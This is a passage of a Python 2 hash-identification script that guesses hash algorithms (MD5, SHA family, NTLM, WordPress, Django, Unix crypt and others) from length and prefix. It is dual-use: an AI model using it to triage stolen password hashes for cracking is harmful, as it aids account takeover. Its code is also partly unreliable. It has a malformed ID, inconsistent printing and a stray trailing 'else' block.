len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 593 | jerar.append("106560") 594 | def md5md5saltmd5pass(): 595 | hs='8966f37dbb4aca377a71a9d3d09cd1ac' 596 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 597 | jerar.append("106580") 598 | def md5md5usernamepasssalt(): 599 | hs='4319a3befce729b34c3105dbc29d0c40' 600 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 601 | jerar.append("106600") 602 | def md5md5md5pass(): 603 | hs='ea086739755920e732d0f4d8c1b6ad8d' 604 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 605 | jerar.append("106620") 606 | def md5md5md5md5pass(): 607 | hs='02528c1f2ed8ac7d83fe76f3cf1c133f' 608 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 609 | jerar.append("106640") 610 | def md5md5md5md5md5pass(): 611 | hs='4548d2c062933dff53928fd4ae427fc0' 612 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 613 | jerar.append("106660") 614 | def md5sha1pass(): 615 | hs='cb4ebaaedfd536d965c452d9569a6b1e' 616 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 617 | jerar.append("106680") 618 | def md5sha1md5pass(): 619 | hs='099b8a59795e07c334a696a10c0ebce0' 620 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 621 | jerar.append("106700") 622 | def md5sha1md5sha1pass(): 623 | hs='06e4af76833da7cc138d90602ef80070' 624 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 625 | jerar.append("106720") 626 | def md5strtouppermd5pass(): 627 | hs='519de146f1a658ab5e5e2aa9b7d2eec8' 628 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 629 | jerar.append("106740") 630 | 631 | def LineageIIC4(): 632 | hs='0x49a57f66bd3d5ba6abda5579c264a0e4' 633 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: 634 | jerar.append("107080") 635 | def MD5phpBB3(): 636 | hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' 637 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: 638 | jerar.append("107040") 639 | def MD5Unix(): 640 | hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' 641 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: 642 | jerar.append("107060") 643 | def MD5Wordpress(): 644 | hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' 645 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: 646 | jerar.append("107020") 647 | 648 | def MD5APR(): 649 | hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' 650 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: 651 | jerar.append("108020") 652 | 653 | def Haval160(): 654 | hs='a106e921284dd69dad06192a4411ec32fce83dbb' 655 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 656 | jerar.append("109100") 657 | def Haval160HMAC(): 658 | hs='29206f83edc1d6c3f680ff11276ec20642881243' 659 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 660 | jerar.append("109200") 661 | def MySQL5(): 662 | hs='9bb2fb57063821c762cc009f7584ddae9da431ff' 663 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 664 | jerar.append("109040") 665 | def MySQL160bit(): 666 | hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' 667 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: 668 | jerar.append("109060") 669 | def RipeMD160(): 670 | hs='dc65552812c66997ea7320ddfb51f5625d74721b' 671 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 672 | jerar.append("109120") 673 | def RipeMD160HMAC(): 674 | hs='ca28af47653b4f21e96c1235984cb50229331359' 675 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 676 | jerar.append("109180") 677 | def SHA1(): 678 | hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' 679 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 680 | jerar.append("109020") 681 | def SHA1HMAC(): 682 | hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' 683 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 684 | jerar.append("109140") 685 | def SHA1MaNGOS(): 686 | hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' 687 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 688 | jerar.append("109220") 689 | def SHA1MaNGOS2(): 690 | hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' 691 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 692 | jerar.append("109240") 693 | def Tiger160(): 694 | hs='c086184486ec6388ff81ec9f235287270429b225' 695 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 696 | jerar.append("109080") 697 | def Tiger160HMAC(): 698 | hs='6603161719da5e56e1866e4f61f79496334e6a10' 699 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 700 | jerar.append("109160") 701 | def sha1passsalt(): 702 | hs='f006a1863663c21c541c8d600355abfeeaadb5e4' 703 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 704 | jerar.append("109260") 705 | def sha1saltpass(): 706 | hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' 707 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 708 | jerar.append("109280") 709 | def sha1saltmd5pass(): 710 | hs='860465ede0625deebb4fbbedcb0db9dc65faec30' 711 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 712 | jerar.append("109300") 713 | def sha1saltmd5passsalt(): 714 | hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' 715 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 716 | jerar.append("109320") 717 | def sha1saltsha1pass(): 718 | hs='58714327f9407097c64032a2fd5bff3a260cb85f' 719 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 720 | jerar.append("109340") 721 | def sha1saltsha1saltsha1pass(): 722 | hs='cc600a2903130c945aa178396910135cc7f93c63' 723 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 724 | jerar.append("109360") 725 | def sha1usernamepass(): 726 | hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' 727 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 728 | jerar.append("109380") 729 | def sha1usernamepasssalt(): 730 | hs='00025111b3c4d0ac1635558ce2393f77e94770c5' 731 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 732 | jerar.append("109400") 733 | def sha1md5pass(): 734 | hs='fa960056c0dea57de94776d3759fb555a15cae87' 735 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 736 | jerar.append("1094202") 737 | def sha1md5passsalt(): 738 | hs='1dad2b71432d83312e61d25aeb627593295bcc9a' 739 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 740 | jerar.append("109440") 741 | def sha1md5sha1pass(): 742 | hs='8bceaeed74c17571c15cdb9494e992db3c263695' 743 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 744 | jerar.append("109460") 745 | def sha1sha1pass(): 746 | hs='3109b810188fcde0900f9907d2ebcaa10277d10e' 747 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 748 | jerar.append("109480") 749 | def sha1sha1passsalt(): 750 | hs='780d43fa11693b61875321b6b54905ee488d7760' 751 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 752 | jerar.append("109500") 753 | def sha1sha1passsubstrpass03(): 754 | hs='5ed6bc680b59c580db4a38df307bd4621759324e' 755 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 756 | jerar.append("109520") 757 | def sha1sha1saltpass(): 758 | hs='70506bac605485b4143ca114cbd4a3580d76a413' 759 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 760 | jerar.append("109540") 761 | def sha1sha1sha1pass(): 762 | hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' 763 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 764 | jerar.append("109560") 765 | def sha1strtolowerusernamepass(): 766 | hs='79f575543061e158c2da3799f999eb7c95261f07' 767 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 768 | jerar.append("109580") 769 | 770 | def Haval192(): 771 | hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' 772 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 773 | jerar.append("110040") 774 | def Haval192HMAC(): 775 | hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' 776 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 777 | jerar.append("110080") 778 | def Tiger192(): 779 | hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' 780 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 781 | jerar.append("110020") 782 | def Tiger192HMAC(): 783 | hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' 784 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 785 | jerar.append("110060") 786 | 787 | def MD5passsaltjoomla1(): 788 | hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' 789 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: 790 | jerar.append("112020") 791 | 792 | def SHA1Django(): 793 | hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' 794 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: 795 | jerar.append("113020") 796 | 797 | def Haval224(): 798 | hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' 799 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 800 | jerar.append("114040") 801 | def Haval224HMAC(): 802 | hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' 803 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 804 | jerar.append("114080") 805 | def SHA224(): 806 | hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' 807 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 808 | jerar.append("114020") 809 | def SHA224HMAC(): 810 | hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' 811 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 812 | jerar.append("114060") 813 | 814 | def SHA256(): 815 | hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' 816 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 817 | jerar.append("115020") 818 | def SHA256HMAC(): 819 | hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' 820 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 821 | jerar.append("115120") 822 | def Haval256(): 823 | hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' 824 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 825 | jerar.append("115040") 826 | def Haval256HMAC(): 827 | hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' 828 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 829 | jerar.append("115140") 830 | def GOSTR341194(): 831 | hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' 832 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 833 | jerar.append("115060") 834 | def RipeMD256(): 835 | hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' 836 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 837 | jerar.append("115080") 838 | def RipeMD256HMAC(): 839 | hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' 840 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 841 | jerar.append("115160") 842 | def SNEFRU256(): 843 | hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' 844 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 845 | jerar.append("115100") 846 | def SNEFRU256HMAC(): 847 | hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' 848 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 849 | jerar.append("115180") 850 | def SHA256md5pass(): 851 | hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' 852 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 853 | jerar.append("115200") 854 | def SHA256sha1pass(): 855 | hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' 856 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 857 | jerar.append("115220") 858 | 859 | def MD5passsaltjoomla2(): 860 | hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' 861 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: 862 | jerar.append("116020") 863 | def SAM(): 864 | hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' 865 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: 866 | jerar.append("116040") 867 | 868 | def SHA256Django(): 869 | hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' 870 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: 871 | jerar.append("117020") 872 | 873 | def RipeMD320(): 874 | hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' 875 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 876 | jerar.append("118020") 877 | def RipeMD320HMAC(): 878 | hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' 879 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 880 | jerar.append("118040") 881 | 882 | def SHA384(): 883 | hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' 884 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 885 | jerar.append("119020") 886 | def SHA384HMAC(): 887 | hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' 888 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 889 | jerar.append("119040") 890 | 891 | def SHA256s(): 892 | hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' 893 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: 894 | jerar.append("120020") 895 | 896 | def SHA384Django(): 897 | hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' 898 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: 899 | print " [+] SHA-384(Django)" 900 | jerar.append("121020") 901 | 902 | def SHA512(): 903 | hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' 904 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 905 | jerar.append("122020") 906 | def SHA512HMAC(): 907 | hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' 908 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 909 | jerar.append("122060") 910 | def Whirlpool(): 911 | hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' 912 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 913 | jerar.append("122040") 914 | def WhirlpoolHMAC(): 915 | hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' 916 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 917 | jerar.append("122080") 918 | 919 | 920 | print logo 921 | while True: 922 | jerar=[] 923 | print """ 924 | -------------------------------------------------------------------------""" 925 | hash = raw_input(" HASH: ") 926 | ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() 927 | 928 | if len(jerar)==0: 929 | print "" 930 | print " Not Found." 931 | elif len(jerar)>2: 932 | jerar.sort() 933 | print "" 934 | print "Possible Hashs:" 935 | print "[+] ",algorithms[jerar[0]] 936 | print "[+] ",algorithms[jerar[1]] 937 | print "" 938 | print "Least Possible Hashs:" 939 | for a in range(int(len(jerar))-2): 940 | print "[+] ",algorithms[jerar[a+2]] 941 | else: 942 | jerar.sort() 943 | print "" 944 | print "Possible Hashs:" 945 | for a in range(len(jerar)): 946 | print "[+] ",algorithms[jerar[a]] 947 | else: 948 | os.system('clear') 949 | sys.exit(0) 950 | print logo 951 | print "Select 1-5" 952 | --------------------------------------------------------------------------------